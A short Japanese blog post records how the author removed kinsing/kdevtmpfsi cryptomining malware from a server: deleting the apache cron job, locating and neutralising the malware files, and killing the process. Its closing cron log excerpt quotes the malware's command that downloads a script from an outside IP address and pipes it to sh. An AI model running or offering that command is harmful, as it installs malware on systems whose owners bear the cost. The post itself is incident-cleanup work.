はじめに
仮想通貨をマイニングするマルウェア kinsing(kdevtmpfsi)に感染していたため、削除するための手順を記録します。
CPU使用率99%!
削除方法
cron無効化
1分置きに定期実行されているcronを削除・再作成して、使えないようにします。
rm /var/spool/cron/apache
mkdir /var/spool/cron/apache
chmod 755 /var/spool/cron/apache
マルウェアファイル検索
find / -name kdevtmpfsi
find / -name kinsing
いくつかのディレクトリから対象のファイルが見つかります。
私の場合は以下の5ディレクトリ
- /tmp
- /tmp/systemd-private-*
- /var/tmp
- /var/tmp/systemd-private-*
- /dev/shm
マルウェアファイル無効化
ファイル検索で見つかったマルウェアファイル(kdevtmpfsiとkinsing)を削除・再作成して、使えないようにします。
rm ./kdevtmpfsi
touch ./kdevtmpfsi
chmod 644 ./kdevtmpfsi
rm ./kinsing
touch ./kinsing
chmod 644 ./kinsing
kdevtmpfsi○○というファイルがたくさん見つかった場合、全削除します。
rm -rf ./kdevtmpfsi*
プロセス削除
検索して出てきたプロセスをkillします。
ps -ef | grep kdevtmpfsi
kill 9999
おわりに
ちなみにcronのログには怖そうなログがたくさん出ていました。
vi /var/log/cron
日付 CROND[21134]: (apache) CMD (wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1)
日付 crond[18693]: (apache) INFO (Job execution of per-minute job scheduled for 14:13 delayed into subsequent minute 14:15. Skipping job run.)